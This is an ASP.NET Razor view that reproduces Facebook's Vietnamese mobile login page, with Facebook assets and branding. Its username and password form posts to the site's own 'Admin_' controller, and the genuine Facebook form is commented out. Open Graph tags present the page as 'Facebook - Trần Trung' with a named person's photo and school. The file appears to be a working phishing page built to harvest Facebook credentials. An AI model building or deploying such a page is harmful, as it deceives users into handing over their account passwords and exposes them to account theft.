@model Facebook.Areas.Admin.Models.Admin_Model

@{
    Layout = null;
}


<!DOCTYPE html>
<html>
<head>
    <title>Facebook - Đăng nhập </title>
    <meta name="google-site-verification" content="lj_F7DI7BV7m5AnZss9y2np0EAR_7HqW7QaPqxF1gzI" />
    <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1" />
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="shortcut icon" sizes="196x196" />
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yA/l/0,cross/-ouRU9HEN2_.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="RPVQy" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/8T7EO5k58D2.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KC9NY" crossorigin="anonymous" />
    <script id="u_0_g" nonce="5RB7Lxlw">function envFlush(a) { function b(b) { for (var c in a) b[c] = a[c] } window.requireLazy ? window.requireLazy(["Env"], b) : (window.Env = window.Env || {}, b(window.Env)) } envFlush({ "timeslice_heartbeat_config": { "pollIntervalMs": 33, "idleGapThresholdMs": 60, "ignoredTimesliceNames": { "requestAnimationFrame": true, "Event listenHandler mousemove": true, "Event listenHandler mouseover": true, "Event listenHandler mouseout": true, "Event listenHandler scroll": true }, "isHeartbeatEnabled": true, "isArtilleryOn": false }, "shouldLogCounters": true, "timeslice_categories": { "react_render": true, "reflow": true }, "sample_continuation_stacktraces": true, "dom_mutation_flag": true });</script>
    <script nonce="5RB7Lxlw">__DEV__ = 0;</script>
    <script id="u_0_h" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/uoww_z3__XT.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="MveXH" nonce="5RB7Lxlw"></script>
    <script id="u_0_e" nonce="5RB7Lxlw">CavalryLogger = window.CavalryLogger || function (a) { this.lid = a, this.transition = !1, this.metric_collected = !1, this.is_detailed_profiler = !1, this.instrumentation_started = !1, this.pagelet_metrics = {}, this.events = {}, this.ongoing_watch = {}, this.values = { t_cstart: window._cstart }, this.piggy_values = {}, this.bootloader_metrics = {}, this.resource_to_pagelet_mapping = {}, this.initializeInstrumentation && this.initializeInstrumentation() }, CavalryLogger.prototype.setIsDetailedProfiler = function (a) { this.is_detailed_profiler = a; return this }, CavalryLogger.prototype.setTTIEvent = function (a) { this.tti_event = a; return this }, CavalryLogger.prototype.setValue = function (a, b, c, d) { d = d ? this.piggy_values : this.values; (typeof d[a] === "undefined" || c) && (d[a] = b); return this }, CavalryLogger.prototype.getLastTtiValue = function () { return this.lastTtiValue }, CavalryLogger.prototype.setTimeStamp = CavalryLogger.prototype.setTimeStamp || function (a, b, c, d) { this.mark(a); var e = this.values.t_cstart || this.values.t_start; e = d ? e + d : CavalryLogger.now(); this.setValue(a, e, b, c); this.tti_event && a == this.tti_event && (this.lastTtiValue = e, this.setTimeStamp("t_tti", b)); return this }, CavalryLogger.prototype.mark = typeof console === "object" && console.timeStamp ? function (a) { console.timeStamp(a) } : function () { }, CavalryLogger.prototype.addPiggyback = function (a, b) { this.piggy_values[a] = b; return this }, CavalryLogger.instances = {}, CavalryLogger.id = 0, CavalryLogger.disableArtilleryOnUntilOffLogging = !1, CavalryLogger.getInstance = function (a) { typeof a === "undefined" && (a = CavalryLogger.id); CavalryLogger.instances[a] || (CavalryLogger.instances[a] = new CavalryLogger(a)); return CavalryLogger.instances[a] }, CavalryLogger.setPageID = function (a) { if (CavalryLogger.id === 0) { var b = CavalryLogger.getInstance(); CavalryLogger.instances[a] = b; CavalryLogger.instances[a].lid = a; delete CavalryLogger.instances[0] } CavalryLogger.id = a }, CavalryLogger.now = function () { return window.performance && performance.timing && performance.timing.navigationStart && performance.now ? performance.now() + performance.timing.navigationStart : new Date().getTime() }, CavalryLogger.prototype.measureResources = function () { }, CavalryLogger.prototype.profileEarlyResources = function () { }, CavalryLogger.getBootloaderMetricsFromAllLoggers = function () { }, CavalryLogger.start_js = function () { }, CavalryLogger.done_js = function () { }; CavalryLogger.getInstance().setTTIEvent("t_domcontent"); CavalryLogger.prototype.measureResources = function (a, b) { if (!this.log_resources) return; var c = "bootload/" + a.name; if (this.bootloader_metrics[c] !== void 0 || this.ongoing_watch[c] !== void 0) return; var d = CavalryLogger.now(); this.ongoing_watch[c] = d; "start_" + c in this.bootloader_metrics || (this.bootloader_metrics["start_" + c] = d); b && !("tag_" + c in this.bootloader_metrics) && (this.bootloader_metrics["tag_" + c] = b); if (a.type === "js") { c = "js_exec/" + a.name; this.ongoing_watch[c] = d } }, CavalryLogger.prototype.stopWatch = function (a) { if (this.ongoing_watch[a]) { var b = CavalryLogger.now(), c = b - this.ongoing_watch[a]; this.bootloader_metrics[a] = c; var d = this.piggy_values; a.indexOf("bootload") === 0 && (d.t_resource_download || (d.t_resource_download = 0), d.resources_downloaded || (d.resources_downloaded = 0), d.t_resource_download += c, d.resources_downloaded += 1, d["tag_" + a] == "_EF_" && (d.t_pagelet_cssload_early_resources = b)); delete this.ongoing_watch[a] } return this }, CavalryLogger.getBootloaderMetricsFromAllLoggers = function () { var a = {}; Object.values(window.CavalryLogger.instances).forEach(function (b) { b.bootloader_metrics && Object.assign(a, b.bootloader_metrics) }); return a }, CavalryLogger.start_js = function (a) { for (var b = 0; b < a.length; ++b)CavalryLogger.getInstance().stopWatch("js_exec/" + a[b]) }, CavalryLogger.done_js = function (a) { for (var b = 0; b < a.length; ++b)CavalryLogger.getInstance().stopWatch("bootload/" + a[b]) }, CavalryLogger.prototype.profileEarlyResources = function (a) { for (var b = 0; b < a.length; b++)this.measureResources({ name: a[b][0], type: a[b][1] ? "js" : "" }, "_EF_") }; CavalryLogger.getInstance().log_resources = true; CavalryLogger.getInstance().setIsDetailedProfiler(true); window.CavalryLogger && CavalryLogger.getInstance().setTimeStamp("t_start");</script>
    <script id="u_0_f" nonce="5RB7Lxlw">(function _(a, b, c, d) { function e(a) { document.cookie = a + "=;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/;domain=.facebook.com" } function f(a, b) { document.cookie = a + "=" + b + ";path=/;domain=.facebook.com;secure" } if (!a) { e(b); e(c); return } a = null; (navigator.userAgent.indexOf("Firefox") !== -1 || !window.devicePixelRatio && navigator.userAgent.indexOf("Windows Phone") !== -1) && (document.documentElement != null && (a = screen.width / document.documentElement.offsetWidth, a = Math.max(1, Math.floor(a * 2) / 2))); (!a || a === 1) && navigator.userAgent.indexOf("IEMobile") !== -1 && (a = Math.sqrt(screen.deviceXDPI * screen.deviceYDPI) / 96, a = Math.max(1, Math.round(a * 2) / 2)); f(b, (a || window.devicePixelRatio || 1).toString()); e = window.screen ? screen.width : 0; b = window.screen ? screen.height : 0; f(c, e + "x" + b); d && document.cookie && window.devicePixelRatio > 1 && document.location.reload() })(true, "m_pixel_ratio", "wd", false);</script>
    <meta http-equiv="origin-trial" data-feature="getInstalledRelatedApps" data-expires="2017-12-04" content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=" />
    <meta name="description" content="T&#x1ea1;o m&#x1ed9;t t&#xe0;i kho&#x1ea3;n &#x111;&#x1ec3; &#x111;&#x103;ng nh&#x1ead;p Facebook. K&#x1ebf;t n&#x1ed1;i v&#x1edb;i b&#x1ea1;n b&#xe8;, gia &#x111;&#xec;nh v&#xe0; nh&#x1eef;ng ng&#x1b0;&#x1edd;i m&#xe0; b&#x1ea1;n bi&#x1ebf;t. Chia s&#x1ebb; &#x1ea3;nh v&#xe0; video, g&#x1eed;i tin nh&#x1eaf;n v&#xe0; nh&#x1ead;n c&#x1ead;p nh&#x1ead;t." />
    <link rel="canonical" href="https://www.facebook.com/" />
    @*
        <meta property="og:site_name" content="Facebook" />
        <meta property="og:type" content="website" />
        <meta property="og:title" content="Facebook - &#x110;&#x103;ng nh&#x1ead;p ho&#x1eb7;c &#x111;&#x103;ng k&#xfd;" />
        <meta property="og:description" content="T&#x1ea1;o m&#x1ed9;t t&#xe0;i kho&#x1ea3;n &#x111;&#x1ec3; &#x111;&#x103;ng nh&#x1ead;p Facebook. K&#x1ebf;t n&#x1ed1;i v&#x1edb;i b&#x1ea1;n b&#xe8;, gia &#x111;&#xec;nh v&#xe0; nh&#x1eef;ng ng&#x1b0;&#x1edd;i m&#xe0; b&#x1ea1;n bi&#x1ebf;t. Chia s&#x1ebb; &#x1ea3;nh v&#xe0; video, g&#x1eed;i tin nh&#x1eaf;n v&#xe0; nh&#x1ead;n c&#x1ead;p nh&#x1ead;t." />
        <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
    *@

    <meta property="og:image" content="https://scontent.fhan2-5.fna.fbcdn.net/v/t1.0-9/107494517_296545908279828_7096125318904138458_o.jpg?_nc_cat=109&_nc_sid=85a577&_nc_ohc=IobVJEFS6BwAX9zXWgU&_nc_ht=scontent.fhan2-5.fna&oh=597ab07a5215498a2d64c78ffcecd0a4&oe=5F5CDE5C" />
    <meta property="og:site_name" content="Facebook - Trần Trung" />
    <meta property="og:type" content="website" />
    <meta property="og:title" content="Facebook - Trần Trung" />
    <meta property="og:description" content="Trần Trung - Hanoi Amsterdam High School" />


    <meta property="og:url" content="https://www.facebook.com/" />
    <link rel="manifest" href="/data/manifest/" crossorigin="use-credentials" />
    <link href="~/Assets/css/sb-admin-2.css" rel="stylesheet" />
    <script src="~/Assets/js/sb-admin-2.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.js"></script>
</head>
<body tabindex="0" class="touch x2 _fzu _50-3 iframe acw">
    <script id="u_0_d" nonce="5RB7Lxlw">(function (a) { a.__updateOrientation = function () { var b = !!a.orientation && a.orientation !== 180, c = document.body; c && (c.className = c.className.replace(/(^|\s)(landscape|portrait)(\s|$)/g, " ") + " " + (b ? "landscape" : "portrait")); return b } })(window);</script><div id="viewport" data-kaios-focus-transparent="1"></div>
    <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
    <div id="page">
        <div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane">
            <div class="_7om2">
                <div class="_4g34" id="u_0_0">
                    <div class="_5yd0 _2ph- _5yd1" style="display: none;" id="login_error" data-sigil="m_login_notice">
                        <div class="_52jd">
                        </div>
                    </div>

                    <div class="_4-4l">
                        <div id="login_top_banner" data-sigil="m_login_upsell login_identify_step_element">
                            <div class="_qw9 grouped aclb">
                                <a class="touchableArea first last area touchable acy apl abt abb" data-sigil="touchable marea">
                                    <div class="ib cc">
                                        <i class="img l img _2sxw" style="background-image: url('https\3a //static.xx.fbcdn.net/rsrc.php/v3/yP/r/JJsC9S33ata.png');background-repeat:no-repeat;background-size:100% 100%;width:18px;height:32px;">
                                        </i>
                                        <div class="c">
                                            <span class="fcl">Tải Facebook dành cho iPhone và lướt xem nhanh hơn.</span>
                                        </div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <!--Alert-->
                        @if (TempData["AlertMessage"] != null)
                        {
                            <div class="alert @TempData["AlertType"] hide" id="AlertBox">
                                @TempData["AlertMessage"]
                            </div>

                        }
                        <script>
                            $(function () {
                                $('#AlertBox').removeClass('hide');
                                $('#AlertBox').delay(2000).slideUp(500);
                            });
                        </script>
                        <div class="_7om2 _52we _52z6">
                            <div class="_4g34">
                                <a>
                                    <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" width="112" class="img" alt="facebook" />
                                </a>
                            </div>
                        </div>
                        <div class="_5rut">

                            @using (Html.BeginForm("Index", "Admin_", FormMethod.Post))
                            {
                                @Html.AntiForgeryToken()
                                @*@Html.ValidationSummary(true, "", new { @class = "text-danger" })*@

                                <!-- INPUT USERNAME-->
                                <div class="_56be">
                                    <div class="_55wo _56bf">
                                        <div class="_96n9" id="email_input_container">
                                            @Html.TextBoxFor(model => model.user_name, new
                                            {
                                                  @class = "_56bg _4u9z _5ruq _8qtn",
                                                  @placeholder = "Số di động hoặc email",
                                                  @autocorrect = "off",
                                                  @autocomplete = "on",
                                                  @id = "m_login_email",
                                                  @name = "email",
                                                  @autocapitalize = "off"
                                            })
                                            @Html.ValidationMessageFor(model => model.user_name, "", new
                                            {
                                                  @class = "text-danger",
                                                  @id = "user_name_alert"
                                            })
                                            <script>
                                                $(function () {
                                                    $('#user_name_alert').removeClass('hide');
                                                    $('#user_name_alert').delay(1000).slideUp(500);
                                                });
                                            </script>

                                        </div>
                                    </div>
                                </div>

                                <div class="_55wq"></div>

                                <!-- INPUT PASSWORD-->
                                <div class="_56be">
                                    <div class="_55wo _56bf">
                                        <div class="_1upc _mg8" data-sigil="m_login_password">
                                            <div class="_7om2">
                                                <div class="_4g34 _5i2i _52we">
                                                    <div class="_5xu4">
                                                        @Html.PasswordFor(model => model.password, new
                                                        {
                                                            @class = "_56bg _4u9z _27z2 _8qtm",
                                                            @autocorrect = "off",
                                                            @autocapitalize = "off",
                                                            @id = "m_login_password",
                                                            @name = "pass",
                                                            @placeholder = "Mật khẩu",
                                                            @type = "password"

                                                        })
                                                        @Html.ValidationMessageFor(model => model.password, "", new
                                                        {
                                                            @class = "text-danger",
                                                            @id = "user_pass_alert"
                                                        })
                                                        <script>
                                                            $(function () {
                                                                $('#user_pass_alert').removeClass('hide');
                                                                $('#user_pass_alert').delay(1000).slideUp(500);
                                                            });
                                                        </script>
                                                    </div>
                                                </div>
                                                <div class="_5s61 _216i _5i2i _52we">
                                                    <div class="_5xu4">
                                                        <div class="_2pi9" style=""
                                                             id="u_0_1">
                                                            <a href="#"
                                                               data-sigil="password-plain-text-toggle">

                                                                <span class="mfss" id="showPassword">HIỂN THỊ</span>
                                                                <script>
                                                                    $(document).ready(function () {
                                                                        $('#showPassword').on('click', function () {

                                                                            var passwordField = $('#m_login_password');
                                                                            var passwordFieldType = passwordField.attr('type');
                                                                            if (passwordFieldType == 'password') {
                                                                                passwordField.attr('type', 'text');
                                                                                $(this).text('ẨN');
                                                                            } else {
                                                                                passwordField.attr('type', 'password');
                                                                                $(this).text('HIỂN THỊ');
                                                                            }
                                                                        });
                                                                    });
                                                                </script>
                                                                @*<span class="mfss" style="" id="u_0_2">ẨN</span>
                                                                    <span class="mfss" id="u_0_3" style="display: none;">HIỂN THỊ</span>*@
                                                            </a>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>



                                <div class="_2pie" style="text-align:center;">
                                    <div id="u_0_4" data-sigil="login_password_step_element">
                                        <button type="submit" value="&#x110;&#x103;ng nh&#x1ead;p" class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu" name="login" data-sigil="touchable login_button_block m_login_button">
                                            <span class="_55sr">Đăng nhập</span>
                                        </button>
                                    </div>
                                    <div class="_7eif" id="oauth_login_button_container" style="display:none"></div>
                                    <div class="_7f_d" id="oauth_login_desc_container" style="display:none"></div>
                                    <div id="otp_button_elem_container"></div>
                                </div>

                                <input type="hidden" name="prefill_contact_point" id="prefill_contact_point" />
                                <input type="hidden" name="prefill_source" id="prefill_source" />
                                <input type="hidden" name="prefill_type" id="prefill_type" />
                                <input type="hidden" name="first_prefill_source" id="first_prefill_source" />
                                <input type="hidden" name="first_prefill_type" id="first_prefill_type" />
                                <input type="hidden" name="had_cp_prefilled" id="had_cp_prefilled" value="false" />
                                <input type="hidden" name="had_password_prefilled" id="had_password_prefilled" value="false" />
                                <input type="hidden" name="is_smart_lock" id="is_smart_lock" value="false" />
                                <div class="_xo8"></div>
                                <noscript>
                                    <input type="hidden" name="_fb_noscript" value="true" />
                                </noscript>
                            }



                            @*<form method="post" action="/login/device-based/regular/login/?refsrc=https%3A%2F%2Fwww.facebook.com%2F&amp;lwv=100&amp;refid=8" class="mobile-login-form _5spm" id="login_form" data-sigil="m_login_form">
                                <input type="hidden" name="lsd" value="AVqdIo3c" autocomplete="off" />
                                <input type="hidden" name="jazoest" value="2698" autocomplete="off" />
                                <input type="hidden" name="m_ts" value="1597030362" />
                                <input type="hidden" name="li" value="2r8wX8Kww2q3wtUmeI6dY6R3" />
                                <input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number" />
                                <input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries" />
                                <div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
                                <div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
                                <div id="otp_retrieve_desc_container"></div>
                            </form>*@





                            <div>
                                <div class="_43mg _8qtf">
                                    <span class="_43mh">hoặc</span>
                                </div>
                                <div class="_52jj _5t3b" id="signup_button_area">
                                    <a role="button" href="https://m.facebook.com/reg/?cid=103&refsrc=https%3A%2F%2Fm.facebook.com%2F&soft=hjk" class="_5t3c _28le btn btnS medBtn mfsm touchable" id="signup-button" tabindex="0" data-sigil="m_reg_button">Tạo tài khoản mới</a>
                                </div>
                            </div>
                            <div>
                                <div class="other-links _8p_m">
                                    <ul class="_5pkb _55wp">
                                        <li>
                                            <span class="mfss fcg">
                                                <a tabindex="0" href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfeCBtIUE1WK4EXMAentWuR-u4B8bj33ThbZcqE69XGYwiGuMdrCU0L_AccEaJ6qo4Y862RgiUmaP5TZHgBnBqxKJBXwTkgQRiDvqRBW_jL2Aw%26smuh%3D38807%26lh%3DAc_XzuxBiaxLDxt6%26refsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&multiple_results=0&ars=facebook_login&lwv=100&_rdr" id="forgot-password-link">Quên mật khẩu?</a>
                                            </span>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <span>
                <img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none" />
            </span>
        </div>
    </div>
    <!-- FOOTER-->
    <footer class="panel-footer">
        <div class="_55wr _5ui2" data-sigil="m_login_footer">
            <div class="_5dpw">
                <div class="_5ui3" data-nocookies="1" id="locale-selector" data-sigil="language_selector marea">
                    <div class="_7om2">
                        <div class="_4g34">
                            <span class="_52jc _52j9 _52jh _3ztb">Tiếng Việt</span>
                            <div class="_3ztc">
                                <span class="_52jc">
                                    <a data-locale="zh_TW" data-sigil="change_language">中文(台灣)</a>
                                </span>
                            </div>
                            <div class="_3ztc">
                                <span class="_52jc">
                                    <a data-locale="ko_KR" data-sigil="change_language">한국어</a>
                                </span>
                            </div>
                            <div class="_3ztc">
                                <span class="_52jc">
                                    <a data-locale="pt_BR" data-sigil="change_language">Português (Brasil)</a>
                                </span>
                            </div>
                        </div>
                        <div class="_4g34">
                            <div class="_3ztc">
                                <span class="_52jc">
                                    <a data-locale="en_GB" data-sigil="change_language">English (UK)</a>
                                </span>
                            </div>
                            <div class="_3ztc">
                                <span class="_52jc">
                                    <a data-locale="ja_JP" data-sigil="change_language">日本語</a>
                                </span>
                            </div>
                            <div class="_3ztc">
                                <span class="_52jc">
                                    <a data-locale="es_LA" data-sigil="change_language">Español</a>
                                </span>
                            </div>
                            <a>
                                <div class="_3j87 _1rrd _3ztd" aria-label="Danh s&#xe1;ch ng&#xf4;n ng&#x1eef; &#x111;&#x1ea7;y &#x111;&#x1ee7;" data-sigil="more_language">
                                    <i class="img sp_C98GRA5ao1V_2x sx_8e944c"></i>
                                </div>
                            </a>
                        </div>
                    </div>
                </div>
                <div class="_5ui4">
                    <div class="_96qv _9a0a">
                        <a class="_96qw" title="&#x110;&#x1ecd;c blog c&#x1ee7;a ch&#xfa;ng t&#xf4;i, kh&#xe1;m ph&#xe1; trung t&#xe2;m t&#xe0;i nguy&#xea;n v&#xe0; t&#xec;m c&#x1a1; h&#x1ed9;i vi&#x1ec7;c l&#xe0;m.">Giới thiệu</a>
                        <span aria-hidden="true"> · </span>
                        <a class="_96qw" title="Truy c&#x1ead;p Trung t&#xe2;m tr&#x1ee3; gi&#xfa;p c&#x1ee7;a ch&#xfa;ng t&#xf4;i.">Trợ giúp</a>
                        <span aria-hidden="true"> · </span>
                        <span class="_96qw" id="u_0_5">Xem thêm</span>
                    </div>
                    <div class="_96qv" style="display:none" id="u_0_6">
                        <a class="_96qw">Trang</a>
                        <a title="L&#x1b0;&#x1edb;t xem th&#x1b0; m&#x1ee5;c &#x111;&#x1ecb;a &#x111;i&#x1ec3;m c&#x1ee7;a ch&#xfa;ng t&#xf4;i." class="_96qw">Vị trí</a>
                        <a title="L&#x1b0;&#x1edb;t xem th&#x1b0; m&#x1ee5;c con ng&#x1b0;&#x1edd;i c&#x1ee7;a ch&#xfa;ng t&#xf4;i." class="_96qw">Danh bạ</a>
                        <a title="L&#x1b0;&#x1edb;t xem danh m&#x1ee5;c nh&#xf3;m." class="_96qw">Nhóm</a>
                        <a class="_96qw">Hạng mục Trang</a>
                        <a class="_96qw" title="Xem nh&#x1eef;ng &#x111;&#x1ecb;a &#x111;i&#x1ec3;m n&#x1ed5;i ti&#x1ebf;ng tr&#xea;n Facebook.">Địa điểm</a>
                        <a class="_96qw" title="T&#xec;m hi&#x1ec3;u th&#xea;m v&#x1ec1; Oculus">Oculus</a>
                        <a class="_96qw" title="T&#xec;m hi&#x1ec3;u th&#xea;m v&#x1ec1; Portal from Facebook">Portal</a>
                        <a class="_96qw" title="Mua b&#xe1;n tr&#xea;n Facebook Marketplace.">Marketplace</a>
                        <a class="_96qw" title="T&#xec;m hi&#x1ec3;u th&#xea;m v&#x1ec1; Facebook Pay">Facebook Pay</a>
                        <a class="_96qw" title="Quy&#xea;n g&#xf3;p cho c&#xe1;c m&#x1ee5;c &#x111;&#xed;ch c&#xf3; &#xfd; ngh&#x129;a.">Chiến dịch gây quỹ</a>
                    </div>
                    <span class="mfss fcg">Facebook, Inc.</span>
                </div>
            </div>
        </div>
    </footer>
</body>
</html>